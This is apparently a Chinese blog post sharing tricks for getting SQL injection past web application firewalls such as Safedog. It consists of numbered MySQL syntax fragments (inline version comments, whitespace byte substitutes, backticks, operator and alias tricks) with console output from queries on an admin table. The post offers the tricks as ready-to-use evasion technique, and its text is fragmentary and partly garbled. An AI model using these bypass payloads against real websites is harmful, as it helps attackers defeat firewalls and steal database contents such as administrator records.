web站点过防火墙,安全狗常见技巧分享

*******************************************************0x001
/*!*/,


*******************************************************0x002
SELECT[0x09,


*******************************************************0x003
0x0A-0x0D,

*******************************************************0x004

0x20,0xA0]xx FROM 

*******************************************************0x005
//" ' " 


mysql> select`version`()
    -> ;
+----------------------+
| `version`()          |
+----------------------+
| 5.1.50-community-log |
+----------------------+
1 row in set (0.00 sec)


mysql> select id from qs_admins where id=1;`dfff and comment it;
+----+
| id |
+----+
|  1 |
+----+
1 row in set (0.00 sec)
 `>


*******************************************************0x006
//"-+."

mysql> select id from qs_admins;

+----+
| id |
+----+
|  1 |
+----+

1 row in set (0.00 sec)
 
mysql> select+id-1+1.from qs_admins;

+----------+
| +id-1+1. |
+----------+
|        1 |
+----------+

1 row in set (0.00 sec)

mysql> select-id-1+3.from qs_admins;
+----------+
| -id-1+3. |
+----------+
|        1 |
+----------+
1 row in set (0.00 sec)


*******************************************************0x007
//"@"

mysql> select@^1.from qs_admins;
+------+
| @^1. |
+------+
| NULL |
+------+


*******************************************************0x008
//"mysql function() as xxx"

mysql> select-count(id)test from qs_admins;

+------+

| test |

+------+

|   -1 |

+------+


1 row in set (0.00 sec)
*******************************************************0x009
//--/*![>5000]*/ 

mysql> /*!40000select*/ id from qs_admins;
+----+
| id |
+----+
|  1 |
+----+

1 row in set (0.00 sec)

*******************************************************0x010

%20=

/*? =?*/

你可能感兴趣的:(源码分享,安全札记,网络安全与恶意代码)